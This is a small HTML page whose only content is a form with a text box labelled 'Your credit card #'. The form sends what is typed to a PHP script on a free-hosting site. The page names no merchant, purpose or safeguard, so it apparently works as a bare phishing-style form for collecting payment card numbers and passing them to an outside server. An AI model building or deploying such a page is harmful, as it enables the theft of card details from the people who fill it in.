<!DOCTYPE html>
<html>

<head>
<link rel="stylesheet" href="style/style.css">
<meta name="viewport" content="width=device-width, initial-scale=.5">
<title>Textbox</title>
<script src="https://kit.fontawesome.com/28200a00ab.js" crossorigin="anonymous"></script>
<link rel="icon" type="image/x-icon" href="dice.svg">

</head>

<style>
    .submit{
        border-style: solid;
        border-width: 1.5px;
        border-radius: 5px;
        border-color: black;
        padding: 10px 30px;
        background-color: rgb(255, 228, 202);
        font-size: 14pt;
        transition-duration: .4s;
        text-decoration: none;
        color: black;
    }

    .box{
        border-style: solid;
        border-width: 1.5px;
        border-radius: 5px;
        height: 4cm;
        border-color: black;
        padding: 10px 30px;
        background-color: rgb(255, 228, 202);
        font-size: 14pt;
        transition-duration: .4s;
        text-decoration: none;
        color: black;
     }
</style>

<body>
        <form style="text-align: center;" action="https://www.nicholashayek.rf.gd/home/vol1_8/infinityfree.com/if0_35939706/htdocs/output.php" method="POST">
            <input type="text" name="submission" class="box" 
            required placeholder="Your credit card #"><br><br>
            <input type="submit" value="WA" class="submit">
          </form>
</body>